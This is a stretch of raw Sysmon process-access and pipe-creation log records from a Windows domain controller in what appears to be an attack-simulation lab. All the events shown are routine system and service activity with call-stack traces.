09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.968{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:16.826{5EBD8912-8CC0-6151-1600-00000000FD01}1296\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERC:\Windows\system32\svchost.exe 10341000x80000000000000001053075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.806{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.806{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.759{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.759{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.759{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.712{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2F00-00000000FD01}2544C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.711{5EBD8912-8CD0-6151-2F00-00000000FD01}25443156C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+6ed7e 10341000x80000000000000001053068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.711{5EBD8912-8CD0-6151-2F00-00000000FD01}25443156C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+6ed7e 10341000x80000000000000001053067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 